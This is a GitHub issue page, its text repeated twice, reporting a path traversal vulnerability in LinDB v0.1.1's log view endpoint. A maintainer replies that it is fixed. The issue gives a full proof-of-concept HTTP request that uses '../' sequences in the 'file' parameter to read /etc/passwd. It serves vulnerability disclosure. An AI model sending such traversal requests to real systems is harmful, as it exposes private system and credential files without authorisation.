We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello, im just find security issue in Log View endpoint, attacker can arbitrary read local files from "file" parameter.
Here is HTTP-Request for reading /etc/passwd : [code] GET /api/v1/log/view?file=../../../../../../../../../etc/passwd HTTP/1.1 Host: lindb:9000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://lindb:9000/console/assets/index.8a526aef.js [/code]
Here is line from source code:
lindb/internal/monitoring/log_handle.go
Line 126 in 1966dd6
Log viewer must read only files in logfiles directory. Please Fix this issue and request CVE
LinDB: v0.1.1, BuildDate: 2023-01-18T11:28:06+0900 GOOS="linux" GOARCH="amd64" GOVERSION="go1.19.3"
The text was updated successfully, but these errors were encountered:
fixed
Sorry, something went wrong.
stone1100
No branches or pull requests
Hello, im just find security issue in Log View endpoint, attacker can arbitrary read local files from "file" parameter.
Here is HTTP-Request for reading /etc/passwd :
[code]
GET /api/v1/log/view?file=../../../../../../../../../etc/passwd HTTP/1.1
Host: lindb:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://lindb:9000/console/assets/index.8a526aef.js
[/code]
Here is line from source code:
lindb/internal/monitoring/log_handle.go
Line 126 in 1966dd6
Log viewer must read only files in logfiles directory.
Please Fix this issue and request CVE
LinDB: v0.1.1, BuildDate: 2023-01-18T11:28:06+0900
GOOS="linux"
GOARCH="amd64"
GOVERSION="go1.19.3"
The text was updated successfully, but these errors were encountered: